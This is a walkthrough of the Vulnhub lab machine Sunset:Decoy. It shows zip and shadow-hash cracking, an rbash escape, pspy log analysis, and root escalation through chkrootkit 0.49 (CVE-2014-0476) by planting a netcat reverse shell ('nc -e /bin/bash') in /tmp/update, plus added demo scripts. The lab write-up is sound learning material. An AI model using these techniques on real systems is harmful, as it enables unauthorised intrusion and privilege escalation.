[VLN] Sunset:Decoy

Today we are going to hack the Vulnhub machine called Sunset:Decoy. You can download it from the following link: Sunset-Decoy

Video


Enumeration


We start with an nmap scan of all TCP ports to see which ones are open.

~> nmap -A -p- 192.168.1.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 10:09 CEST
Nmap scan report for 60832e9f188106ec5bcc4eb7709ce592.home (192.168.1.123)
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds
If we visit http://192.168.1.123 we see an Apache directory listing (nmap's http-ls script already showed it) offering a single file, save.zip. We download it.

~/ctf/vulnhub/decoy > wget http://192.168.1.123/save.zip
--2020-07-10 10:12:52--  http://192.168.1.123/save.zip
Connecting to 192.168.1.123:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3123 (3.0K) [application/zip]
Saving to: 'save.zip'

save.zip              100%[=========================>]   3.05K  --.-KB/s    in 0s

2020-07-10 10:12:52 (712 MB/s) - 'save.zip' saved [3123/3123]
When we try to unzip it we find it is password protected. The archive uses classic ZipCrypto (fcrackzip cannot attack AES-encrypted zips), so we use fcrackzip with the rockyou wordlist to crack the password (-u makes it verify each candidate with unzip, which avoids false positives).

~/ctf/vulnhub/decoy > fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip
found file 'etc/passwd', (size cp/uc    668/  1807, flags 9, chk 90ab)
found file 'etc/shadow', (size cp/uc    434/  1111, flags 9, chk 834f)
found file 'etc/group', (size cp/uc    460/   829, flags 9, chk 8d07)
found file 'etc/sudoers', (size cp/uc    368/   669, flags 9, chk 1535)
found file 'etc/hosts', (size cp/uc    140/   185, flags 9, chk 8759)
found file 'etc/hostname', (size cp/uc     45/    33, flags 9, chk 8ce8)

PASSWORD FOUND!!!!: pw == manuel
We unzip the file with the cracked password (manuel). It contains a copy of the machine's /etc account files.

~/ctf/vulnhub/decoy > unzip save.zip
group
hostname
hosts 
passwd  
shadow 
sudoers
From the shadow file we take the last user together with its hash and save that line in tocrack.txt. (Instead of copying by hand, john's unshadow tool merges passwd and shadow into the same user:hash format.)

~/ctf/vulnhub/decoy > nano tocrack.txt
#content
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.
The $6$ prefix marks it as sha512crypt, so we crack it with john and the rockyou wordlist.

~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt --wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server           (96640a3b825115a47b68fc44501c828)
1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password is "server". We log in over ssh :)

Low Shell



~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123
The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.1.123's password: 
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
On login we land in a restricted shell (rbash); the "dircolors: command not found" message is the tell, since the startup files try to run it and rbash's restricted PATH cannot find it. To escape, we log in again, this time giving ssh a command to run instead of opening the login shell:

~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.1.123's password: 
python3 -c 'import pty; pty.spawn("/bin/bash")'
This works because sshd hands the command to the login shell as rbash -c "bash --noprofile": rbash still allows running a command it finds on PATH, and the bash it starts that way is not restricted. --noprofile keeps that bash from reading the profile scripts, which is where restricted setups usually pin PATH. The python one-liner then gives us a proper pty. Finally we export a less limited PATH.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export PATH=/bin:/usr/bin:$PATH
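The following is an added example, not part of the original write-up, showing what rbash refuses and why the ssh trick above gets past it. It uses bash -r, which is the same restricted mode a login shell of /bin/rbash runs in, so it can be tried on any box with bash and without a restricted account.

```shell
#!/bin/sh
# Added example (not from the original write-up): probe rbash restrictions and
# demonstrate the escape via an unrestricted child bash. Requires bash on PATH.

# Run one command line under restricted bash; the return value is its exit
# status, so a refused action shows up as non-zero.
rbash_probe() {
    bash -r -c "$1" >/dev/null 2>&1
}

# The escape: rbash may still run a command it finds on PATH, and a plain
# `bash` started that way is not restricted. --noprofile skips the profile
# scripts, which is where restricted setups usually pin PATH.
rbash_escape() {
    bash -r -c "bash --noprofile -c '$1'" 2>/dev/null
}

# Actions rbash refuses (each is expected to fail):
#   cd            -> "bash: cd: restricted"
#   /bin/ls       -> "restricted: cannot specify `/' in command names"
#   PATH=...      -> "bash: PATH: readonly variable"
#   > file        -> "restricted: cannot redirect output"
for probe in 'cd /tmp' '/bin/ls' 'PATH=/tmp:$PATH' 'echo x > /dev/null'; do
    if rbash_probe "$probe"; then
        echo "allowed: $probe"
    else
        echo "refused: $probe"
    fi
done

# A PATH-resolved command is fine, which is exactly what the escape relies on.
if rbash_probe 'ls'; then echo "allowed: ls (resolved via PATH)"; fi

# Same `cd`, but inside the unrestricted child shell:
echo "escaped: $(rbash_escape 'cd /tmp && pwd')"
```

The probes print "refused" for the four restricted actions and "/tmp" for the escape; on a real target the equivalent check is simply whether the login shell in /etc/passwd is rbash and whether bash (or python, vi, less, and similar) is reachable from the restricted PATH.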
We explore our user's home folder.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls
fich  logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls
log.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt
---- SNIP ----
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=10     | 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash 
Exiting program... (interrupt)

---- SNIP ----
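Reading pspy output by eye works for a short log, but on a busy host it is easier to filter it. The following is an added example (not part of the original write-up) that extracts the commands pspy saw running as UID 0 and the versioned software names inside them; the sample log is constructed from the lines shown above.

```shell
#!/bin/sh
# Added example (not part of the original write-up): filter a pspy log for
# root-run commands and versioned software names. Sample log constructed from
# the lines in the write-up.

LOG=$(mktemp)
cat > "$LOG" <<'EOF'
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
EOF

# Distinct commands pspy saw running as UID 0. Kernel threads show an empty
# CMD and are dropped; the pspy banner has no '|' and never matches.
pspy_root_cmds() {
    awk -F'|' '$1 ~ /CMD: UID=0[[:space:]]/ {
        cmd = $2
        gsub(/^[[:space:]]+|[[:space:]]+$/, "", cmd)
        if (cmd != "") print cmd
    }' "$1" | sort -u
}

# Software names carrying a version number (e.g. chkrootkit-0.49) inside the
# root commands: these are what to look up for known local exploits.
pspy_root_versions() {
    pspy_root_cmds "$1" | grep -oE '[A-Za-z][A-Za-z0-9_]*-[0-9]+(\.[0-9]+)+' | sort -u
}

echo "== commands run as root =="
pspy_root_cmds "$LOG"
echo "== versioned software in root commands =="
pspy_root_versions "$LOG"
```

On the sample log the second function prints chkrootkit-0.49; the "-bash" entries are also worth noting, since they show an interactive root shell driving the unpack rather than a cron job.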
The log is pspy output: a root process (UID=0) unpacks chkrootkit-0.49.tar.gz, so chkrootkit 0.49 is most likely being run as root on this machine. A quick search turns up a public exploit for that version [1]: chkrootkit 0.49 (CVE-2014-0476) executes /tmp/update with its own privileges if that file exists, because of an unquoted variable assignment in its slapper() check.
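To see why a file dropped in /tmp ends up executed as root, here is an added example (not chkrootkit's code and not part of the original write-up) that reproduces the root cause in a scratch directory, without chkrootkit or root privileges. The vulnerable line is taken from chkrootkit 0.49's slapper() function; the marker file stands in for the reverse shell.

```shell
#!/bin/sh
# Added example (not chkrootkit's code or the write-up's): reproduce the
# chkrootkit 0.49 bug (CVE-2014-0476). In slapper() the line
#
#     file_port=$file_port $i
#
# lacks quotes. The shell parses it as the assignment `file_port=...` prefixed
# to a COMMAND, `$i`, so every existing path in SLAPPER_FILES (which includes
# /tmp/update) is executed with chkrootkit's privileges, normally root's.

WORK=$(mktemp -d)

# Stand-in for /tmp/update: records that it ran instead of calling back.
printf '#!/bin/sh\necho executed > "%s/marker"\n' "$WORK" > "$WORK/update"
chmod +x "$WORK/update"

# The vulnerable construct, with the original's missing quotes, applied to a
# candidate list like SLAPPER_FILES. Prints the collected list.
vulnerable_slapper() {
    file_port=
    for i in "$@"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i      # runs $i instead of appending it
        fi
    done
    echo "$file_port"
}

# The straightforward fix, as the patched release does in effect: quote the
# assignment so $i is data, never a command.
fixed_slapper() {
    file_port=
    for i in "$@"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    echo "$file_port"
}

payload_ran() { [ -f "$WORK/marker" ]; }
reset_marker() { rm -f "$WORK/marker"; }

reset_marker
echo "vulnerable: file_port='$(vulnerable_slapper "$WORK/update" "$WORK/absent")'"
if payload_ran; then echo "vulnerable: payload executed"; fi

reset_marker
echo "fixed:      file_port='$(fixed_slapper "$WORK/update" "$WORK/absent")'"
if payload_ran; then echo "fixed: payload executed"; else echo "fixed: payload NOT executed"; fi
```

Note that the vulnerable version also leaves file_port empty, because the assignment only applies to the environment of the command it prefixes; the payload runs, and the check it was meant to feed never sees the path. The same pattern (an unquoted `VAR=$VAR $x`) is worth grepping for in any root-run shell script.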

Privilege Escalation


Following those steps, we create the file /tmp/update so that it launches a reverse shell. No shebang is needed: when execve refuses the file as a plain text file, the calling shell falls back to running it as a script.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo "nc -e /bin/bash 192.168.1.111 7777" > update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update
nc -e /bin/bash 192.168.1.111 7777
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod +x update
We start nc listening on our machine.

~ > nc -nlvp 7777
listening on [any] 7777 ...
Finally, we run the honeypot.decoy program found in our home directory and select option 5, which launches chkrootkit (the "AV scan") as root.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5
5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
A moment later... we get the root shell! :)

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@60832e9f188106ec5bcc4eb7709ce592:~# id
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt
cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

End


And with that we are root on the machine :)

[1] https://www.exploit-db.com/exploits/33899